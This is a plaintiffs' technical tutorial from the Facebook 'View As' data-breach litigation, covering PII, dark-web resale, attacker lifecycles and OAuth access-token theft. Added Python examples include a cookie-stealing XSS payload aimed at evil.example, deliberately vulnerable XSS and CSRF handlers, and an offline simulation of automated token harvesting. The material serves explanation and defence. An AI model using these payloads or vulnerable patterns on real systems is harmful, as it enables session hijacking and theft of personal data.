Echavarria, et al. v. Facebook, Inc.
3:18-cv-05982-WHA (and all related cases)
Plaintiffs' Tutorial, January 9, 2019
2019 – Plaintiffs' Tutorial in 3:18-cv-05982-WHA (and all related cases) 1
Introduction
• Plaintiffs' Counsel
  • Morgan & Morgan, P.A. Complex Litigation Group
  • Cohen Milstein Sellers & Toll PLLC
  • Milberg Tadler Phillips Grossman LLP
• Retained Experts
  • Mary T. Frantz will discuss:
    • PII, its Value, and Basic Security Against Hacking
  • Matt B. Strebe will discuss:
    • Authentication, Access Tokens, and Hacking Tokens
• Some questions moving forward
PII, Its Value, and Basic Security Against Hacking
• Mary Frantz
  • Over 28 years' experience in cybersecurity, corporate enterprise technology architecture, identity and access management
  • CEO of Enterprise Knowledge Partners, LLC
  • Has served as an expert witness in several data breach cases
  • Certified Ethical Hacker, Penetration Tester, Information Systems Auditor
  • CV provided for the Court and counsel
Personally Identifiable Information (PII)
• General Definition and California CalOPPA
  • PII Defined (California Online Privacy Protection Act (CalOPPA), Cal. Bus. & Prof. Code Sec. 22577(a))
    • Details collected on the Internet about an individual consumer, including an individual's first and last name, a physical street address, an email address, a telephone number, a Social Security number, or any other information that permits a specific individual to be contacted physically or online.
• Compromised PII has two major types
  • Temporary or "changeable" information: short shelf life
    • Examples: passwords, credit card numbers, bank accounts, driver's license, email, phone numbers
  • Historical or "unchangeable" information: long or infinite shelf life
    • Examples: original images/photos, passport numbers, current and previous addresses, mother's maiden name, relationships (family, contacts, challenge-response questions), education, birth date, SSN, employment history, earnings and net worth, health history, purchase history, product designs, online comments, signed docs
PII – Value
• Aggregated Profiles or Fullz
  • Fullz: complete "packages" of information
    • Combination of historical and temporary information
  • Highest value: Fullz aggregated with behavioral and personality profile descriptors
    • Opinions, contacts, family members, style and event choices, online and physical locations visited, interests (for example: music, movies, colors, auto purchases, and sites visited), "changeable" and "unchangeable" information
    • Confidential corporate information and IP, customer complaints, confidential electronic communication
• Value of PII
  • Validated and/or recently updated Fullz PII = higher street price per profile
  • Fullz is highly coveted by nation states, "phishers," malicious hackers, and spammers
  • Neural-marketing: the process of mining Fullz for targeted influence and manipulation
  • Collection and mining of Fullz has been used by nation state clandestine operations
PII – Darknet and Dark Web
• Darknet
  • System of routers and relay devices that are not indexed or directly accessible
  • All communication between the relays is encrypted
  • Cannot access the Darknet using standard internet browsers; must know the exact address or use a Dark Web browser
• Dark Web
  • The subset of the Darknet that serves web content (HTML pages over HTTP)
  • Web services and specific browsers are required to reach it
  • Built upon anonymous browsing
  • Specific, anonymous services available: messaging, email, file-sharing sites
PII – How It is Misused
• Big data repositories created from compromised and legitimate PII on the Darknet
  • Combined and blended as needed
  • Sold off in pieces for continued revenue streams
  • Pieces sold rarely equate to exact copies of stolen data (obfuscates source and trail)
  • Complete Fullz NOT usually found or sold on Darknet auction sites
• Use of the Dark Web for selling stolen data
  • "Changeable" information often sold on sales or auction sites; currency is BTC
  • Pieces of Fullz are sold on sales or auction sites
    • Usually copies (not original), with diminished value
  • Complete Fullz sales use private messaging, secure emails, burner phones
Typical Targeting Attacker Lifecycle (not all phases are used or needed; the process is not linear)
Standard Attacker Lifecycle (phases, in order): Reconnaissance; Scanning and Penetration; Attempt Access; Establish Foothold; Establish Persistence; Exfiltrate; Eliminate intrusion evidence
• Perform physical, logical reconnaissance (website, employees, physical sites, etc.)
• Use web crawlers/spiders, NMAP
• Vulnerability scan
• Register as developer and gain insights
• Test possible vulnerabilities, learn from error messages/responses
• Test access: see what works, what doesn't, and why
• Access and create "backdoors"
• Open up ports
• Harvest and/or elevate credentials (impersonate real user and service accounts)
• Root
• Delete evidence as they go (advanced), timestomp (alter file timestamps)
• Exfiltrate
• Leave backdoors
• Delete logs
• May sell or share vulnerability to script kiddies to cover tracks, create noise (cause chaos)
• Come back after noise calms down, or use noise as a cover
• Watch for reactions, method of remediation
High Level Hacker Lifecycle
• Advanced attackers do not want to get caught; they maximize "time on target"
• "Script kiddies" are not advanced; they often make noise that is [sometimes] easily detected
Sample Crawl or Spider
• Using a free tool provided by OWASP called "ZAP" (Zed Attack Proxy)
• Finds/crawls all URLs and calls being used by the application during each step of a process
• Look for exposed information including cookies, tokens, login credentials, infrastructure info, etc.
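What the crawl described above amounts to, reduced to its essentials, as an added example (not ZAP's code and not from the tutorial): the "site" is a constructed in-memory dictionary of HTTP responses so the spider runs offline, and the checks are the ones the slide lists, namely tokens carried in URLs or page script, session cookies set without Secure/HttpOnly, and server version strings that give away infrastructure details. Host names, cookie names and the token value are all made up.

```python
import re
from html.parser import HTMLParser
from urllib.parse import parse_qs, urljoin, urlparse

# Constructed sample site standing in for HTTP responses: url -> (headers, HTML body).
SITE = {
    "https://app.example/": (
        {"Server": "nginx/1.14.0", "Set-Cookie": "sid=abc123; Path=/"},
        '<a href="/profile?user=42">Profile</a> <a href="/help">Help</a>',
    ),
    "https://app.example/profile?user=42": (
        {"Server": "nginx/1.14.0", "Set-Cookie": "sid=abc123; Path=/; Secure; HttpOnly"},
        '<script>var accessToken="EAAB.constructed.token";</script>'
        '<a href="/video?access_token=EAAB.constructed.token">Play</a>',
    ),
    "https://app.example/video?access_token=EAAB.constructed.token": (
        {"Server": "nginx/1.14.0"},
        "<p>video</p>",
    ),
    "https://app.example/help": (
        {"Server": "nginx/1.14.0"},
        '<a href="https://other.example/x">external</a>',
    ),
}

TOKEN_PARAMS = {"access_token", "token", "auth", "session", "sid", "password"}
TOKEN_IN_SCRIPT = re.compile(r'(access_?token|api_?key|password)\s*[:=]\s*["\']', re.I)


class LinkExtractor(HTMLParser):
    """Collects href targets of <a> tags; the spider follows these."""
    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.links.append(value)


def fetch(url):
    """Stand-in for an HTTP GET against the constructed site."""
    return SITE.get(url, ({}, ""))


def inspect(url, headers, body):
    """Apply the exposure checks to one response; returns (kind, url, detail) tuples."""
    found = []
    # 1. Secrets in the query string end up in logs, referrers and browser history.
    for name in parse_qs(urlparse(url).query):
        if name.lower() in TOKEN_PARAMS:
            found.append(("token-in-url", url, name))
    # 2. A session cookie without Secure/HttpOnly is sent in clear or readable by script.
    cookie = headers.get("Set-Cookie", "")
    if cookie:
        flags = {part.strip().lower() for part in cookie.split(";")[1:]}
        missing = [flag for flag in ("secure", "httponly") if flag not in flags]
        if missing:
            found.append(("cookie-missing-flags", url, ",".join(missing)))
    # 3. A token embedded in page script is visible to anyone who can view the source.
    match = TOKEN_IN_SCRIPT.search(body)
    if match:
        found.append(("token-in-script", url, match.group(1)))
    # 4. A version string in the Server header is infrastructure info for the attacker.
    if re.search(r"/\d+\.\d+", headers.get("Server", "")):
        found.append(("server-version", url, headers["Server"]))
    return found


def crawl(start, fetch=fetch):
    """Breadth-first crawl limited to the start host; returns (visited urls, findings)."""
    host = urlparse(start).netloc
    queue, seen, findings = [start], set(), []
    while queue:
        url = queue.pop(0)
        if url in seen or urlparse(url).netloc != host:
            continue
        seen.add(url)
        headers, body = fetch(url)
        findings.extend(inspect(url, headers, body))
        parser = LinkExtractor()
        parser.feed(body)
        for href in parser.links:
            queue.append(urljoin(url, href))
    return sorted(seen), findings


if __name__ == "__main__":
    urls, findings = crawl("https://app.example/")
    print("crawled:", *urls, sep="\n  ")
    for kind, url, detail in findings:
        print(f"{kind:22} {url}  [{detail}]")
```

Against a real target the `fetch` stand-in would be replaced by an HTTP client and the crawl scoped to hosts you are authorized to test; the inspection logic is the part that carries over.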
Typical Targeting Attacker Lifecycle (not all phases are used or needed; the process is not linear)
Standard Attacker Lifecycle (phases, in order): Reconnaissance; Scanning and Penetration; Attempt Access; Establish Foothold; Establish Persistence; Exfiltrate; Eliminate intrusion evidence
Defensible Posture and Cyber Resilience (Typical Corporate Cyber Threat Mitigation, set against the attacker phases): External Threat Intelligence; Self Reconnaissance; External Vulnerability Scanning; Harden/Isolate Environments; Logging/Monitoring; Internal Vulnerability Scanning; Secure Application Development/Testing; Third Party Assessments; Threat Mitigation; Threat Remediation; Bug Bounty Programs; each of these feeds back to inform & improve the cycle
High Level Security Lifecycle
• Emulate attacker/black hat reconnaissance, scanning and pen testing
• Monitor the darknet for chatter about attacks, data dumps
• Monitor and log for anomalous behavior
• Constant vulnerability testing using latest signatures
• Security test/code review new releases; regression test existing software/code services/web/data stores/apps/containers
• Harden devices/services
• Constant training/updating
• Periodic live testing of IR (incident response) plan
• Security Posture Assessments
• Red Team/Blue Team exercises
• Third party audits, internal audits
• Third party testing via bug bounty
• Corporate Owners
  • CISO, Compliance Officer, General Counsel
  • Security Architecture
  • SOC
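One concrete form the "monitor and log for anomalous behavior" item can take, added here as an example rather than anything from the tutorial or a vendor product: a rule over web access logs that flags a single source address acting as an unusual number of distinct users inside a short sliding window, which is the signature of the automated token-harvesting crawl described later in the deck. The log format, the addresses and the user ids are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed log format: ISO timestamp, source address, method, path, acting user id.
LINE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<path>\S+) user=(?P<user>\S+)$")

# Constructed sample log: two ordinary users, and one source acting as six users in six seconds.
SAMPLE_LOG = """\
2018-09-25T10:00:00 203.0.113.5 GET /profile/1001 user=1001
2018-09-25T10:00:07 203.0.113.5 GET /photos/1001 user=1001
2018-09-25T10:01:00 198.51.100.9 GET /profile/2001 user=2001
2018-09-25T10:01:01 198.51.100.9 GET /profile/2002 user=2002
2018-09-25T10:01:02 198.51.100.9 GET /profile/2003 user=2003
2018-09-25T10:01:03 198.51.100.9 GET /profile/2004 user=2004
2018-09-25T10:01:04 198.51.100.9 GET /profile/2005 user=2005
2018-09-25T10:01:05 198.51.100.9 GET /profile/2006 user=2006
2018-09-25T10:30:00 192.0.2.77 GET /profile/3001 user=3001
2018-09-25T11:30:00 192.0.2.77 GET /profile/3002 user=3002
"""


def parse(lines):
    """Yield one event dict per well-formed log line; malformed lines are skipped."""
    for line in lines:
        match = LINE.match(line.strip())
        if match:
            event = match.groupdict()
            event["ts"] = datetime.fromisoformat(event["ts"])
            yield event


def find_token_harvesters(lines, window=timedelta(minutes=5), max_users=3):
    """Return {source: sorted user ids} for every source that acted as more than
    max_users distinct users within some window of the given length."""
    by_src = defaultdict(list)
    for event in parse(lines):
        by_src[event["src"]].append((event["ts"], event["user"]))

    alerts = {}
    for src, events in by_src.items():
        events.sort()
        worst, start = set(), 0
        for end in range(len(events)):
            # Advance the window start until the window is no wider than allowed.
            while events[end][0] - events[start][0] > window:
                start += 1
            distinct = {user for _, user in events[start:end + 1]}
            if len(distinct) > len(worst):
                worst = distinct
        if len(worst) > max_users:
            alerts[src] = sorted(worst)
    return alerts


if __name__ == "__main__":
    for src, users in find_token_harvesters(SAMPLE_LOG.splitlines()).items():
        print(f"ALERT {src} acted as {len(users)} distinct users: {', '.join(users)}")
```

The threshold and window are deliberately small for the sample; in production they would be tuned against the legitimate rate at which one address changes identity (shared NAT, support staff, and the site's own impersonation features such as "View As" all raise the baseline).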
Securing Databases
• Generally, two types of databases: Structured (SQL) and Unstructured (No-SQL)
  • Many No-SQL databases do not ship with audit trails or built-in security enabled by default
  • Encrypting storage may cause unacceptable latency, but an organization can encrypt tiers based upon last access date, age of data, and other qualifiers
• Best practice for No-SQL is a combination of the following:
  • Strong multi-factor authentication and authorization
  • Strong perimeter network and isolation
  • Change default ports
  • Segmentation of access rights (gateways)
  • Time-based access controls
  • Disallow concurrent access
  • Input and extract validation
  • Audit or log all plugin access (trusted and untrusted) and server logs, and control access to the logs
  • Replication and data segmentation, key structures
  • Strong encryption where possible
Securing Web Apps
• OWASP (Open Web Application Security Project)
  • Globally recognized non-profit for web application security best practices and standards
  • Industry standard:
    • Test for the Top 10 Security Risks for web-based applications
    • Open source vulnerability scanning software
    • Software Assurance Maturity Model (SAMM)
    • Open source tools and resources: testing tools, best practice code
  • Accepted as the standard for web-based applications by most organizations
• OWASP critical threats and penetration testing methods
  • Cross Site Scripting (XSS)
    • Enables attackers to inject client-side scripts, bypass access controls such as the same-origin policy, and steal visible tokens and cookies
  • Cross Site Request Forgery (CSRF, also written XSRF)
  • Broken Access Control
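The first two OWASP risks listed above, shown as the vulnerable snippet beside its hardened form. This is an added example, not code from the tutorial or from any framework; the comment renderer, the transfer handler, the server secret and the session ids are all constructed.

```python
import hashlib
import hmac
import secrets
from html import escape

# --- Cross Site Scripting ---------------------------------------------------
XSS_PAYLOAD = '<script>fetch("https://evil.example/?c="+document.cookie)</script>'


def render_comment_vulnerable(author, text):
    """Untrusted input is concatenated straight into the HTML, so a comment
    containing XSS_PAYLOAD runs in every viewer's browser, with that viewer's
    cookies and any token visible to page script."""
    return f"<p><b>{author}</b>: {text}</p>"


def render_comment_safe(author, text):
    """html.escape turns <, >, &, \" and ' into entities, so the same payload is
    displayed as text instead of executed."""
    return f"<p><b>{escape(author)}</b>: {escape(text)}</p>"


# --- Cross Site Request Forgery ---------------------------------------------
SERVER_SECRET = secrets.token_bytes(32)  # constructed; in practice loaded from configuration


def csrf_token(session_id, secret=SERVER_SECRET):
    """Anti-forgery token bound to one session: HMAC-SHA256(secret, session_id)."""
    return hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()


def handle_transfer_vulnerable(session_id, form):
    """Acts on any POST that carries the session cookie. A page on another site
    can make the victim's browser submit this form, and the cookie goes with it."""
    return f"moved {form['amount']} for {session_id}"


def handle_transfer_safe(session_id, form, secret=SERVER_SECRET):
    """Same action, but the form must also carry the token for this session,
    which a cross-site page cannot read because of the same-origin policy."""
    presented = form.get("csrf", "")
    if not hmac.compare_digest(presented, csrf_token(session_id, secret)):
        return "rejected: missing or foreign CSRF token"
    return f"moved {form['amount']} for {session_id}"


if __name__ == "__main__":
    print(render_comment_vulnerable("mallory", XSS_PAYLOAD))
    print(render_comment_safe("mallory", XSS_PAYLOAD))
    print(handle_transfer_vulnerable("sess-victim", {"amount": "100"}))
    print(handle_transfer_safe("sess-victim", {"amount": "100"}))
    print(handle_transfer_safe("sess-victim", {"amount": "100", "csrf": csrf_token("sess-victim")}))
```

Escaping at output time is the general fix for XSS regardless of where the data came from; the CSRF token works only because the attacker's page can submit the form but cannot read the token out of the victim's page, so an XSS hole on the same site defeats the CSRF defence as well.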
Authentication, Access Tokens, and Hacking Tokens
• Matt Strebe
  • Over 29 years of experience in the field of cybersecurity, database design and security, secure network protocols, and cryptography
  • CEO of Connetic IT Services & CeNRG cloud hosting
  • Has served as an expert witness in several data breach cases
  • Author of numerous books and publications, including Network Security Foundations & Firewalls 24x7
  • Inventor, "No Transfer" (NOTX) patented device authentication protocol
  • CV provided for the Court and counsel
Authentication
• Logging in
• Access to Private Resources
• Access Control Lists
• Sessions and Web Sessions
  • Web site simultaneous access to multiple resources in a distributed web application
  • Authentication and Authorization are different matters
  • Here, it appears authentication is the issue, not encryption
  • Large scale web applications typically use access tokens to solve distributed access control issues
Access Tokens
• Access Token
  • An access token is an object encapsulating the security identity of a process such as a web session. A token is used to make security decisions and to store tamper-proof information about some system entity. An access token is generated by the logon service when a user logs on to the system.
  • Bearer instrument example: court access key cards
  • Can contain anything the developer wants
  • An Access Token could be limited to a single purpose (master key v. bathroom key)
• Types of Tokens
  • User Access Token (short-term, long-term)
  • App Access Token
  • Refresh Token
• For Facebook
  • Here, it appears the token Facebook associated with the "View As" function gave the hacker the same access as the original user (e.g., key card)
How Tokens are Transacted and Used
• Token portability (and theft-ability)
  • They are protected
    • On Web servers by encryption at rest
    • In transit over the Internet by encryption in flight
    • On Web browsers by encryption at rest
  • They are not necessarily protected in the running web browser
  • Developers must be careful when sending Access Tokens to the web browser client, such that a token applies only to that user
  • For the developer, a conscious trade-off between security and ease-of-use
  • Expedited access requires constant vigilance upon implementation
  • An access token should never be exposed to any other user in a running browser
OAuth 2.0
• OAuth 2.0 is an authorization protocol frequently used as an easier authentication protocol
• Used by companies like Facebook
• The access token supplants other authentication steps
• Allows third-party marketers some benefits
  • For example: simple user experience to prevent "usage walls" and encourage adoption
• Adoption of OAuth 2.0
OAuth 2.0 – Vulnerabilities
• But OAuth 2.0 presents a greater risk of the "bearer instrument" being misused
• You don't have to decrypt or comprehend an Access Token to use it
• When you find someone else's Access Token in a web session, you have whatever level of access that token permits within its expiration
• Ease of coding, code re-use, complex application design, and lack of testing lead to mistakes and increased risks to users' PII
How Tokens Can Be Exploited
• Hackers determine that they can exploit a web site to obtain another user's Access Token
• Hackers access the web site as each user, access PII, then identify and steal other available Access Tokens
• And repeat. Very quickly, a hacker can obtain many millions of accounts' Access Tokens with automated scripts ("crawling")
• PII is taken, is in the possession of hackers, and is misused and/or sold
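The three slides on access tokens, the bearer-instrument risk and the crawl, worked through in code as an added example. It is modelled on the tutorial's description of the mistake, not on Facebook's implementation, which the deck does not show: the token format (HMAC-signed claims with an expiry), the user store, the friend graph and the `view_as` functions are all constructed. The vulnerable `view_as` hands the viewer a token minted for the *target*; the hardened one only ever issues a token scoped to the viewer and the preview, so nothing that leaves the server can read anyone else's private data. `harvest` is the automated crawl from the last slide.

```python
import base64
import hashlib
import hmac
import json
import time

SECRET = b"constructed-server-secret"  # the logon service's signing key


def mint(subject, scope, ttl=3600, now=None):
    """Issue a tamper-evident bearer token: base64(claims).hex(HMAC-SHA256)."""
    claims = {"sub": subject, "scope": scope, "exp": int(now or time.time()) + ttl}
    body = base64.urlsafe_b64encode(json.dumps(claims, sort_keys=True).encode()).decode()
    sig = hmac.new(SECRET, body.encode(), hashlib.sha256).hexdigest()
    return f"{body}.{sig}"


def verify(token, now=None):
    """Return the claims if signature and expiry hold, else None.  Nothing here
    asks who presented the token: whoever holds it is treated as the subject."""
    try:
        body, sig = token.split(".")
    except ValueError:
        return None
    expected = hmac.new(SECRET, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(sig, expected):
        return None
    claims = json.loads(base64.urlsafe_b64decode(body))
    if claims["exp"] < (now or time.time()):
        return None
    return claims


# Constructed user store: private PII plus each user's friend list.
USERS = {
    "alice": {"email": "alice@example.net", "friends": ["bob", "carol"]},
    "bob":   {"email": "bob@example.net",   "friends": ["alice", "dave"]},
    "carol": {"email": "carol@example.net", "friends": ["alice"]},
    "dave":  {"email": "dave@example.net",  "friends": ["bob"]},
}


def read_private(token, user):
    """Private data is served only to a full-scope token whose subject is that user."""
    claims = verify(token)
    if not claims or claims["sub"] != user or claims["scope"] != "full":
        return None
    return USERS[user]


def view_as_vulnerable(viewer_token, target):
    """Builds the target's page by minting the target's own full-scope token and
    embedding it in the response.  The viewer now holds a bearer instrument for
    the target, exactly like being handed someone else's key card."""
    if not verify(viewer_token):
        return None
    return {"page": f"public profile of {target}", "embedded_token": mint(target, "full")}


def view_as_safe(viewer_token, target):
    """Same page, but the only token that leaves the server belongs to the viewer
    and is scoped to this preview; it cannot read the target's private data."""
    viewer = verify(viewer_token)
    if not viewer:
        return None
    preview = mint(viewer["sub"], f"preview:{target}", ttl=300)
    return {"page": f"public profile of {target}", "embedded_token": preview}


def harvest(start_token, view_as):
    """The automated crawl: use every token held so far to View As each friend,
    pocket whatever token comes back, and repeat.  Returns the set of users whose
    private data became readable starting from a single token."""
    tokens = {verify(start_token)["sub"]: start_token}
    queue = list(tokens)
    while queue:
        user = queue.pop()
        for friend in USERS[user]["friends"]:
            if friend in tokens:
                continue
            page = view_as(tokens[user], friend)
            if page and read_private(page["embedded_token"], friend):
                tokens[friend] = page["embedded_token"]
                queue.append(friend)
    return set(tokens)


if __name__ == "__main__":
    attacker = mint("alice", "full")  # one legitimately obtained token
    print("vulnerable View As:", sorted(harvest(attacker, view_as_vulnerable)))
    print("hardened View As:  ", sorted(harvest(attacker, view_as_safe)))
```

Two points the code makes concrete: `verify` proves only that the server issued the token, never that the presenter is its subject, which is what "bearer instrument" means; and the blast radius of the mistake is set by the friend graph, not by the number of tokens the attacker started with, which is why the crawl scales to millions of accounts from one.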
Preliminary Questions
1. How was the "View As" token developed, and how was its security and functionality tested, prior to release?
   a) What process did Facebook use to test the "View As" feature prior to release?
   b) Where else was/is the token used?
   c) What Security Development (i.e. Secure SDLC) processes does Facebook use to test their software prior to release?
2. When did Facebook first detect the issue, and how?
3. When did Facebook identify the root cause of the issue, and how?
4. Any report done by Facebook or a third party?
5. How did Facebook determine the affected entities?
6. What steps did Facebook take to contain and remediate the issue?